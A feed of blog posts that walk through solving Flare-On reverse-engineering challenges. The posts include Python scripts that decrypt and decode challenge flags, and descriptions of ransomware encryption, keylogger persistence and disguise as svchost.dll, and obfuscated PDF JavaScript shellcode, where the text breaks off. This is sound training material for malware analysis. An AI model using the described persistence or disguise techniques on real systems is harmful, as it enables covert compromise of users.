https://ben.the-collective.net/tags/ctf/ Recent content in ctf on Ben's ideas and projects Hugo -- gohugo.io en locutus@the-collective.net (Ben Mason) locutus@the-collective.net (Ben Mason) ©2023, All Rights Reserved Tue, 27 Apr 2021 09:00:00 -0400 daily https://ben.the-collective.net/posts/2021-04-27-flare-on-5-1/ Tue, 27 Apr 2021 09:00:00 -0400 locutus@the-collective.net (Ben Mason) Tue, 27 Apr 2021 09:00:00 -0400 https://ben.the-collective.net/posts/2021-04-27-flare-on-5-1/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here Starting off the 5 series of challenges we have a very simple password challenge, when extracting the archive you have one file extracted. MinesweeperChampionshipRegistration.jar: Java archive data (JAR) When running the file, you are prompted for an invitation code. I unzipped the jar file finding the metadata and a class file. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>Starting off the 5 series of challenges we have a very simple password challenge, when extracting the archive you have one file extracted.</p> <pre tabindex="0"><code>MinesweeperChampionshipRegistration.jar: Java archive data (JAR) </code></pre><p><img src="../2021-04-27-flare-on-5-1-images/Screen-Shot-2021-03-18-at-12.21.33.png" alt="" /></p> <p>When running the file, you are prompted for an invitation code. I unzipped the jar file finding the metadata and a class file. I ran strings on the class file and was able to see the flag in plain text in the file.</p> <p><img src="../2021-04-27-flare-on-5-1-images/Screen-Shot-2021-03-18-at-12.21.51.png" alt="" /></p> <p>After entering the flag shown in strings into the prompt it is validated!</p> <p><img src="../2021-04-27-flare-on-5-1-images/Screen-Shot-2021-03-18-at-12.21.24.png" alt="" /></p> suidroot featured image ctf flare-on reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-04-20-flare-on-3-challenge-2/ Tue, 20 Apr 2021 09:00:00 -0400 locutus@the-collective.net (Ben Mason) Tue, 20 Apr 2021 09:00:00 -0400 https://ben.the-collective.net/posts/2021-04-20-flare-on-3-challenge-2/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here The archive for this challenge included 2 files. BusinessPapers.doc: data DudeLocker.exe: PE32 executable (console) Intel 80386, for MS Windows I first took a look at the .doc file and it looks to be random data. After doing some initial analysis on the executable file, I found many references to encryption routines in the imports. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>The archive for this challenge included 2 files.</p> <p>BusinessPapers.doc: data<br /> DudeLocker.exe: PE32 executable (console) Intel 80386, for MS Windows</p> <p>I first took a look at the .doc file and it looks to be random data.</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-03-21-at-20.37.50.png" alt="BusinessPapers.doc" /><br /> After doing some initial analysis on the executable file, I found many references to encryption routines in the imports. This program looks to act like ransomware. Diving into the functionality, the program first looks for a directory named “Briefcase.”</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-02-27-at-15.36.26-1.png" alt="" /><br /> <img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-02-27-at-15.36.38.png" alt="" /><br /> If it can not open the directory, it jumps to an error accusing the person of being a reverse engineer!</p> <p>After it validates, it can open the directory properly; a routine is called checking the drive’s serial number looking for a specific value. If the value doesn’t match, the program errors out. If the hard drive’s serial number matches, it jumps to the routine to decode the encryption key. The drive’s serial number and a pointer, the encoded data stored in the .data section, are passed into the mw_decode_key function.</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/flareon-3-2-serial-decode-key.jpg" alt="" /><br /> The mw_decode_key function does what I have named it, it decodes the key used in the data encryption. It uses a simple xor loop to decode the key.</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-02-27-at-15.39.13.png" alt="" /><br /> Now that we have the key decoded it is time for the program to set up and execute the encryption routines. As a way to summarize the overall process, I have created the following diagram showing the connections between all of the functions. The boxes colored in blue are handles to data structures and the boxes in green are variables containing a value. The first step in the entire process to set up the Provider which acts as a glue between the key generation functions. From here let us go through each box in numbered order.</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-02-27-at-15.08.13.png" alt="" />Section 1 is used first to create a Hash of the key based on the SHA1 algorithm. Next, it takes this Hash and derives an AES256 key from the Hash and stores it the Key Handle. The key finally has its mode set a CBC cipher.</p> <p>Section 2 is used to create the IV portion of the key. This is derived from an MD5 hash of the name of the file. This section writes the data to a Hash Handle then copies it out of the handle into the KP_IV parameter of the Key Handle created in section 1.</p> <p>Finally, in section 3, where files are encrypted, the original file is opened and read into a File Buffer which is then read by the CryptEncrypt function that reads the Key Handle and executes the encryption writing it back to the buffer. The buffer is then written back to the original File Handler, overwriting the data on disk.</p> <p>After looking over all of this crypto routine and using a debugger to extract both the main AES key and the IV key values, I created a decryption script in python to extract what I had assumed is encrypted data in the BusinessFiles.doc file. The following script uses the wincrypto and cryptodome packages to more or less follow the process I just outlined instead, decrypting the data.</p> <pre tabindex="0"><code># need wincrypto and cryptodome packages from Crypto.Cipher import AES from Crypto.Hash import MD5 from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey from wincrypto.constants import CALG_SHA1, CALG_AES_256 import magic encryted = &#39;BusinessPapers.doc&#39; encypted_data = open(encryted, &#39;rb&#39;).read() key = b&#39;thosefilesreallytiedthefoldertogether&#39; md5_clear = bytes(encryted.lower(),&#34;UTF-8&#34;) # Derive Key sha1_hasher = CryptCreateHash(CALG_SHA1) CryptHashData(sha1_hasher, key) d_key = CryptDeriveKey(sha1_hasher, CALG_AES_256) # Create IV data iv = MD5.new() iv.update(md5_clear) aes = AES.new(d_key.key, AES.MODE_CBC, iv=bytes.fromhex(iv.hexdigest())) decd = aes.decrypt(encypted_data) print (decd[:20]) print(magic.from_buffer(decd)) hFireWrite = open(&#34;test.bin&#34;, &#39;wb&#39;) hFireWrite.write(decd) hFireWrite.close() </code></pre><p>The output of this script writes the data to disk and provides a preview of the first 20 bytes and the magic block info from the data.</p> <pre tabindex="0"><code>b&#39;\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00&#39; JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=8, manufacturer=Minolta Co., Ltd., model=DiMAGE G500, orientation=upper-left, xresolution=140, yresolution=148, resolutionunit=2], baseline, precision 8, 576x410, components 3 </code></pre><p>Success we have found the flag!</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/test.jpg" alt="" /></p> <h2 id="post-script">Post-Script</h2> <p><img src="../2021-04-20-flare-on-3-challenge-2/Screen-Shot-2021-03-17-at-23.54.57.png" alt="" /><br /> A funny feature of this challenge is that it leaves a ransom note. The note is an image in the resources section of the file. This image is extracted and written to the disk. Then it set the wallpaper using the SystemParametersInfoW API call.</p> <p><img src="../2021-04-20-flare-on-3-challenge-2/image.jpg" alt="" /></p> suidroot featured image ctf encryption flare-on python reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-03-23-flare-on-3-challenges-1/ Tue, 23 Mar 2021 09:00:00 -0400 locutus@the-collective.net (Ben Mason) Tue, 23 Mar 2021 09:00:00 -0400 https://ben.the-collective.net/posts/2021-03-23-flare-on-3-challenges-1/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here This challenge is like a lot of the first levels is a password challenge decoding challenges. In the next screenshot, you can see what happens when you run the executable. I opened the binary up in IDA and found the main function. The Main function starts off setting up handles to read input and loading a string from the . <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>This challenge is like a lot of the first levels is a password challenge decoding challenges. In the next screenshot, you can see what happens when you run the executable.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-03-17-at-21.42.32.png" alt="" /><br /> I opened the binary up in IDA and found the main function. The Main function starts off setting up handles to read input and loading a string from the .rdata section to a local variable.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-02-22-at-21.22.31.png" alt="" /><br /> Taking a look at the string that is loaded, it looks like to be some encoded text. I guess that it is more than likely the password.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-02-22-at-21.22.07.png" alt="" /><br /> Back to the main function, after collecting the inputted password guess from the command line, it takes the inputted string and runs a function to encode it.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-03-17-at-22.35.20.png" alt="" /><br /> Looking at the encoder function I found what looks like a non-standard Base64 character set.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-02-22-at-21.24.02.png" alt="" /><br /> I took the custom Base64, the encoded string I found earlier, and entered them into <a href="https://gchq.github.io/CyberChef/">CyberChef</a> to decode the string. It returns what looks to be the flag.</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-02-22-at-21.20.15.png" alt="" /><br /> To be sure I re-ran the challenge and enter the output and bingo it validates the flag!</p> <p><img src="../2021-03-23-flare-on-3-challenges-1-images/Screen-Shot-2021-03-17-at-21.44.38.png" alt="" /></p> suidroot featured image ctf flare-on reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-03-02-flare-on-2-challenge-5/ Tue, 02 Mar 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 02 Mar 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-03-02-flare-on-2-challenge-5/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here This challenge includes two files, a packet capture formatted in PCAP format and a Windows binary. Opening up the PCAP in Wireshark, I found multiple HTTP streams submitting POST requests. I looked at each of these POST requests and saw they all have a few bytes of content. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>This challenge includes two files, a packet capture formatted in PCAP format and a Windows binary.</p> <p><img src="../2021-03-02-flare-on-2-challenge-5-images/Screen-Shot-2021-01-29-at-00.04.08.png" alt="" /><br /> Opening up the PCAP in Wireshark, I found multiple HTTP streams submitting POST requests. I looked at each of these POST requests and saw they all have a few bytes of content.</p> <p><img src="../2021-03-02-flare-on-2-challenge-5-images/Screen-Shot-2021-01-28-at-23.13.54-1.png" alt="" /><br /> I copied the data from each of these HTTP POST requests and found what looked like a Base64 encoded string.</p> <pre tabindex="0"><code>UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DqxKTxAJ9xuZW= </code></pre><p><img src="../2021-03-02-flare-on-2-challenge-5-images/Screen-Shot-2021-01-28-at-23.30.29.png" alt="" /><br /> When I attempted to decode it using standard Base64 character sets I did not find any recognizable data. I knew that it wouldn’t be that easy.</p> <p>Looking at the strings in the binary, I found two interesting strings, “flarebearstare” which could be a password, and another string that looks like a Base64 alphabet with the uppercase and lower case sections swapped in order.</p> <p>I following the cross-reference for the “flarebearstare” string, finding a function with a data decoder loop. This function is passed data and loops through each byte, subtracting each character in order of “flarebearstare” from the current byte.</p> <p><img src="../2021-03-02-flare-on-2-challenge-5-images/Screen-Shot-2021-01-28-at-23.30.53-1.png" alt="Decoder function" /><br /> Looking over this functionality, I started to write up some code to decode the flag. I grabbed a Base64 library that needed a small modification to use a custom character set. My fork of the code can be found at this repo.</p> <p><a href="https://github.com/suidroot/Python-Base64">https://github.com/suidroot/Python-Base64</a></p> <p>In the screenshot below, you can see my final script in a Jupyter notebook. As an aside, I have been using it for many challenges and other projects to test out decoder and other functionality. They have been instrumental in quick prototyping and experimentation.</p> <p><img src="../2021-03-02-flare-on-2-challenge-5-images/Screen-Shot-2021-02-02-at-18.58.41.png" alt="" /><br /> Success there mostly is the flag. You can see there is some weirdness in the decoding of the flag, but this script decodes the main part of it needed in my mind to call it a solution.</p> <h2 id="full-code">Full Code</h2> <pre tabindex="0"><code>b64encoded = &#34;UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DqxKTxAJ9xuZW==&#34; b64_alphabet = &#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/&#39; b = b64() b64decoded = b.decode(b64encoded, alttable=b64_alphabet) for i in b64decoded: print (hex(ord(i)) + &#34; &#34;, end=&#34;&#34;) print () count = 1 key = &#34;flarebearstare&#34; key_len = len(key) output = &#34;&#34; counter = 0 for i in b64decoded: temp = ord(i) - ord(key[counter]) print (chr(temp),end=&#34;&#34;) #print (i, hex(temp), key[counter], chr(temp)) output += chr(temp) if counter+1 &lt; key_len: counter+=1 else: counter = 0 </code></pre> suidroot featured image ctf flare-on python reverse engineering wireshark Reverse Engineering https://ben.the-collective.net/posts/2021-02-23-flare-on-2-challenge-3/ Tue, 23 Feb 2021 09:05:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 23 Feb 2021 09:05:00 -0500 https://ben.the-collective.net/posts/2021-02-23-flare-on-2-challenge-3/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here In the third challenge, you are greeted with a nice goat named Elfie that when you are typing characters show up on the screen. As always I start off by checking out what kind of binary I am looking at λ file elfie elfie: PE32 executable (console) Intel 80386, for MS Windows As I said we are greeted by thie goat that eats magic keys <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>In the third challenge, you are greeted with a nice goat named Elfie that when you are typing characters show up on the screen. As always I start off by checking out what kind of binary I am looking at</p> <pre tabindex="0"><code>λ file elfie elfie: PE32 executable (console) Intel 80386, for MS Windows </code></pre><p>As I said we are greeted by thie goat that eats magic keys</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.09.43.png" alt="" /><br /> After doing some initial analysis in Ghidra found some strings that indicate that this file might be a python executable.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.18.54.png" alt="" /><br /> <img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.18.33.png" alt="" /><br /> Additionally, the icon embedded in the binary should have been a giveaway. I guessed it was probably a pyInstaller executable. I ran it through <em><a href="https://github.com/extremecoders-re/pyinstxtractor">pyinstextractor.py</a></em> to expand it out and get a copy of the python source to analyze.</p> <pre tabindex="0"><code>C:\Users\IEUser\Desktop λ pyinstxtractor.py elfie.exe C:\Tools\pyinstxtractor\pyinstxtractor.py:86: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module&#39;s documentation for alternative uses import imp [*] Processing elfie.exe [*] Pyinstaller version: 2.1+ [*] Python version: 27 [*] Length of package: 12034944 bytes [*] Found 26 files in CArchive [*] Beginning extraction...please standby [!] Warning: The script is running in a different python version than the one used to build the executable Run this script in Python27 to prevent extraction errors(if any) during unmarshalling [*] Found 244 files in PYZ archive [+] Possible entry point: _pyi_bootstrap [+] Possible entry point: pyi_carchive [+] Possible entry point: elfie [*] Successfully extracted pyinstaller archive: elfie.exe You can now use a python decompiler on the pyc files within the extracted directory C:\Users\IEUser\Desktop </code></pre><p>I found the file <em>elfie</em> and opened it in VSCode to look at the contents.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.11.44.png" alt="" /><br /> it looks to be full of Base64 strings that are concatenated together, decoded, and executed.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.12.14.png" alt="Strings" /><br /> I changed the final operation to print the encoded python code for further analysis.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.13.31.png" alt="" /><br /> The next layer down looked more like normal python code with obfuscated variable names.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.14.30.png" alt="" /><br /> Even looking at the obfuscated code the is pretty obvious but I wanted to clean up some of the variable names to make sure I was not missing anything else.</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.14.41.png" alt="" /><br /> After reversing the string the flag is revealed</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.07.41.png" alt="" /><br /> and Elfie is happy!</p> <p><img src="../2021-02-23-flare-on-2-challenge-3-images/Screen-Shot-2021-01-23-at-18.09.33.png" alt="" /></p> suidroot featured image ctf flare-on python reverse engineering wireshark Reverse Engineering https://ben.the-collective.net/posts/2021-02-16-flare-on-2-challenge-2/ Tue, 16 Feb 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 16 Feb 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-02-16-flare-on-2-challenge-2/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here The second challenge from this season built on the first challenge. It was another password entry challenge but with a more complicated password encoding scheme. First things first I validated what kind of file I was looking at. λ file very_succes very_succes: PE32 executable (console) Intel 80386, for MS Windows When running the file I entered some test data to see how it looked to a user. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>The second challenge from this season built on the first challenge. It was another password entry challenge but with a more complicated password encoding scheme.</p> <p>First things first I validated what kind of file I was looking at.</p> <pre tabindex="0"><code>λ file very_succes very_succes: PE32 executable (console) Intel 80386, for MS Windows </code></pre><p>When running the file I entered some test data to see how it looked to a user.</p> <p><img src="../2021-02-16-flare-on-2-challenge-2-images/Screen-Shot-2021-01-23-at-13.23.59.png" alt="" /><br /> I switched back to Ghidra to do some static analysis on this binary and found the area of code that looked to handle the password comparison. The first check that jumped out to me was the length check that checked to see if the password was 37 characters long.</p> <p><img src="../2021-02-16-flare-on-2-challenge-2-images/Screen-Shot-2021-02-02-at-19.33.18.png" alt="" /><br /> Then I found the encoding and matching bulk of the code which I have commented below. This block of code uses a combination of XOR and Bit-wise shifting of the characters to encode each character of the input to match it against the encoded password.</p> <p><img src="../2021-02-16-flare-on-2-challenge-2-images/Screen-Shot-2021-01-23-at-13.35.08.png" alt="" /><br /> It took me a little bit to see that the SCASB instruction at 0x4010c8 is used to set the zero flag to 1 if the encoded value does not match and jump to a failure condition. Otherwise is set to 0 for success and continues the loop.</p> <p><img src="../2021-02-16-flare-on-2-challenge-2-images/Screen-Shot-2021-01-21-at-20.11.47.png" alt="" /><br /> I ran the binary using x64dbg to walk through and monitor execution manually setting the Zero Flag to check how the algorithm operated. I also identified the location of the encoded key stored in EDI and copied out that data in hex.</p> <pre tabindex="0"><code>AFAAADEB AEAAECA4 BAAFAEAA 8AC0A7B0 BC9ABAA5 A5BAAFB8 9DB8F9AE 9DABB4BC B6B3909A A8 </code></pre><p>As with the first challenge in this season I crudely implemented the encoder in python and using brute force was able to successfully generate the key.</p> <p><img src="../2021-02-16-flare-on-2-challenge-2-images/Screen-Shot-2021-01-23-at-13.23.26.png" alt="" /></p> <h2 id="decoder-code">Decoder code</h2> <pre tabindex="0"><code>encoded = [0xAF, 0xAA, 0xAD, 0xEB, 0xAE, 0xAA, 0xEC, 0xA4, 0xBA, 0xAF, 0xAE, 0xAA, 0x8A, 0xC0, 0xA7, 0xB0, 0xBC, 0x9A, 0xBA, 0xA5, 0xA5, 0xBA, 0xAF, 0xB8, 0x9D, 0xB8, 0xF9, 0xAE, 0x9D, 0xAB, 0xB4, 0xBC, 0xB6, 0xB3, 0x90, 0x9A, 0xA8] result_key = &#34;&#34; def xchg(s1, s2): temp = s1 s1 = s2 s2 = temp return s1, s2 def decoder(text_data): global result_key success_count = 0 bx = 0 dx = 0 key_store = 0 # stack cl = 37 eax = 0x1901c7 for i in text_data: dx = bx dx = dx &amp; 0x3 ah = (eax &amp; 0x0000FF00 &gt; 1) al = (eax &amp; 0x000000FF) dl = (dx &amp; 0x00FF) al = (i ^ al) dl, cl = xchg(dl, cl) ah, cf = ah &lt;&lt; cl, ah &amp; 1 al = al + ah + cf ax = al + (ah*0x100) dl, cl = xchg(dl, cl) dx = 0 dl = 0 ax = ax &amp; 0xff output = ax bx = bx + (ax &amp; 0xff) cl = cl - 0x1 if encoded[cl] != output: pass else: result_key += chr(i) success_count += 1 return success_count test = [65] * 37 for element in range(len(test)): for i in range(0x21,0x7e): test[element] = i succ_coun = decoder(test) if succ_coun &lt; element+1: pass result_key = &#34;&#34; else: print (succ_coun, element, chr(i)) print(&#34;Key:&#34;, result_key) break print (test) print (&#34;resultkey: \&#34;&#34; + result_key + &#34;\&#34;&#34;) </code></pre> suidroot featured image ctf flare-on python reverse engineering wireshark Reverse Engineering https://ben.the-collective.net/posts/2021-02-09-flare-on-2-challenge-1/ Tue, 09 Feb 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 09 Feb 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-02-09-flare-on-2-challenge-1/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here The first challenge in the 2015 season on Flare On was a pretty easy enter the password type of challenge. I started off by opening the extracted file in IDA and running it in the debugger. I stepped to the section of code that evaluates the input versus the input <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>The first challenge in the 2015 season on Flare On was a pretty easy enter the password type of challenge. I started off by opening the extracted file in IDA and running it in the debugger. I stepped to the section of code that evaluates the input versus the input</p> <p><img src="../2021-02-09-flare-on-2-challenge-1-images/Screen-Shot-2021-01-19-at-19.47.26-2.png" alt="Key encoding and comparison routine" /><br /> I extracted the encoded key from memory</p> <p><img src="../2021-02-09-flare-on-2-challenge-1-images/Screen-Shot-2021-01-19-at-19.47.16.png" alt="Encoded Key data" /><br /> Then I re-implemented the XOR encryption in python and generated the key from the data.</p> <p><img src="../2021-02-09-flare-on-2-challenge-1-images/Screen-Shot-2021-01-19-at-19.48.19.png" alt="Jupyter notebook key decoder" /><br /> Which successfully worked!</p> <p><img src="../2021-02-09-flare-on-2-challenge-1-images/Screen-Shot-2021-01-19-at-19.48.04.png" alt="Successful Key Entry" /></p> suidroot featured image ctf flare-on python reverse engineering wireshark Reverse Engineering https://ben.the-collective.net/posts/2021-02-02-flare-on-1-challenge-5-5get_it/ Tue, 02 Feb 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Tue, 02 Feb 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-02-02-flare-on-1-challenge-5-5get_it/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here Challenge 5 brings us a DLL file, I mainly used Ghidra to statically analyze this file. 5get_it: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows After Ghidra loaded and analyzed the file, I found this function at 0x1000a680 that does a few things, first to Reads and writes the Run key to setup persistence for this DLL file, and it also copies itself to the C:\windows\system32 directory as svchost. <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="../2021-02-02-flare-on-1-challenge-5-5get_it-images/">here</a></p> <p>Challenge 5 brings us a DLL file, I mainly used Ghidra to statically analyze this file.</p> <pre tabindex="0"><code>5get_it: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows </code></pre><p>After Ghidra loaded and analyzed the file, I found this function at 0x1000a680 that does a few things, first to Reads and writes the Run key to setup persistence for this DLL file, and it also copies itself to the <em>C:\windows\system32</em> directory as <em>svchost.dll</em> to look like a legitimate DLL file. Next, it executes a function that looks to act as a key logger.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.09.48.png" alt="" /><br /> This function sets up a buffer to store keystrokes into them write them out to a file named <em>svchost.log</em>. Looking at the mw_key_press_handler function we see how it handles the key presses.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.09.13.png" alt="" /><br /> This function has various handler function for each ASCII value for most upper case letters, lower case letter, number, and some other characters. However not all have handler functions, so I took a closer look at the functions.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.10.14.png" alt="" /><br /> Below are three examples of functions, some of the functions would set a global variable to 1 or 0 depending on if another variable was set, and/or call another function that sets a group of global variables to 0. Not all of the functions returned the same letter that was pressed. As shown below “`” returns the number “0”.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.11.35.png" alt="Returns same character" /></p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.10.57.png" alt="Returns different character from input" /></p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.20.13.png" alt="Calls a function to reset all global vars" /><br /> Taking a closer look at the global variables that are manipulated I could see a pattern of them being written or read depending on the keypress handler functions.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-18.12.18.png" alt="" /><br /> Went through the listing of functions and created a list of the key presses and the return values and saw what looks like the key.</p> <table> <thead> <tr> <th>Memory Address</th> <th>Input Char</th> <th>Output Char</th> </tr> </thead> <tbody> <tr> <td>DAT_10019460</td> <td>L</td> <td>l</td> </tr> <tr> <td>DAT_10019464</td> <td>`</td> <td>0</td> </tr> <tr> <td>DAT_10019468</td> <td>G</td> <td>g</td> </tr> <tr> <td>DAT_1001946c</td> <td>G</td> <td>g</td> </tr> <tr> <td>DAT_10019470</td> <td>I</td> <td>i</td> </tr> <tr> <td>DAT_10019474</td> <td>N</td> <td>n</td> </tr> <tr> <td>DAT_10019478</td> <td>G</td> <td>g</td> </tr> <tr> <td>DAT_1001947c</td> <td>D</td> <td>d</td> </tr> <tr> <td>DAT_10019480</td> <td>O</td> <td>o</td> </tr> <tr> <td>DAT_10019484</td> <td>T</td> <td>t</td> </tr> <tr> <td>DAT_10019488</td> <td>U</td> <td>u</td> </tr> <tr> <td>DAT_1001948c</td> <td>R</td> <td>r</td> </tr> <tr> <td>DAT_10019490</td> <td>D</td> <td>d</td> </tr> <tr> <td>DAT_10019494</td> <td>O</td> <td>o</td> </tr> <tr> <td>DAT_10019498</td> <td>T</td> <td>t</td> </tr> <tr> <td>DAT_1001949c</td> <td>e</td> <td>5</td> </tr> <tr> <td>DAT_100194a0</td> <td>T</td> <td>t</td> </tr> <tr> <td>DAT_100194a4</td> <td>R</td> <td>r</td> </tr> <tr> <td>DAT_100194a8</td> <td>O</td> <td>0</td> </tr> <tr> <td>DAT_100194ac</td> <td>K</td> <td>k</td> </tr> <tr> <td>DAT_100194b0</td> <td>E</td> <td>e</td> </tr> <tr> <td>DAT_100194b4</td> <td>`</td> <td>5</td> </tr> <tr> <td>DAT_100194b8</td> <td>A</td> <td>a</td> </tr> <tr> <td>DAT_100194bc</td> <td>T</td> <td>t</td> </tr> <tr> <td>DAT_100194c0</td> <td>F</td> <td>f</td> </tr> <tr> <td>DAT_100194c4</td> <td>L</td> <td>l</td> </tr> <tr> <td>DAT_100194c8</td> <td>A</td> <td>a</td> </tr> <tr> <td>DAT_100194cc</td> <td>R</td> <td>r</td> </tr> <tr> <td>DAT_100194d0</td> <td>E</td> <td>e</td> </tr> <tr> <td>DAT_100194d4</td> <td>D</td> <td>d</td> </tr> <tr> <td>DAT_100194d8</td> <td>A</td> <td>a</td> </tr> <tr> <td>DAT_100194dc</td> <td>S</td> <td>s</td> </tr> <tr> <td>DAT_100194e0</td> <td>H</td> <td>h</td> </tr> <tr> <td>DAT_100194e4</td> <td>O</td> <td>o</td> </tr> <tr> <td>DAT_100194e8</td> <td>N</td> <td>n</td> </tr> <tr> <td>DAT_100194ec</td> <td>D</td> <td>d</td> </tr> <tr> <td>DAT_100194f0</td> <td>O</td> <td>o</td> </tr> <tr> <td>DAT_100194f4</td> <td>T</td> <td>t</td> </tr> <tr> <td>DAT_100194f8</td> <td>C</td> <td>c</td> </tr> <tr> <td>DAT_100194fc</td> <td>O</td> <td>o</td> </tr> </tbody> </table> <p>But this table does not include the letter “m” at the end of “com” the handler for “M” has an extra function that it calls.</p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-19.00.37.png" alt="" /><br /> This function that the handler calls has a large number of local variables and makes Ghidra very sad, but its main function shows a message box with the flag: <a href="mailto:l0gging.ur.5trok5@flare-on.com">l0gging.ur.5trok5@flare-on.com</a></p> <p><img src="../2021-02-02-flare-on-1-challenge-5-5get_it-images/Screen-Shot-2021-01-16-at-19.13.02.png" alt="" /></p> suidroot featured image ctf flare-on reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-01-28-flare-on-1-challenge-4-sploitastic/ Thu, 28 Jan 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Thu, 28 Jan 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-01-28-flare-on-1-challenge-4-sploitastic/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here We start off with a PDF file in Challenge 4, I start off by dumping the contents of the streams using pdf-parser from Didier Stevens PDF-tools pdf-parser.py -f APT9001.orig.pdf &gt; apt5.txt Looking through the content I find a block of Javascript code that looks interesting <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>We start off with a PDF file in Challenge 4, I start off by dumping the contents of the streams using pdf-parser from <a href="https://blog.didierstevens.com/programs/pdf-tools/">Didier Stevens PDF-tools</a></p> <p><code>pdf-parser.py -f APT9001.orig.pdf &gt; apt5.txt</code></p> <p>Looking through the content I find a block of Javascript code that looks interesting</p> <p><img src="../2021-01-28-flare-on-1-challenge-4-sploitastic-images/Screen-Shot-2021-01-12-at-22.44.13.png" alt="" /><br /> After copying it out and some manual de-obfuscation I find a block of what looks to be hex-encoded shellcode. I grabbed a script to decode it into a binary file to 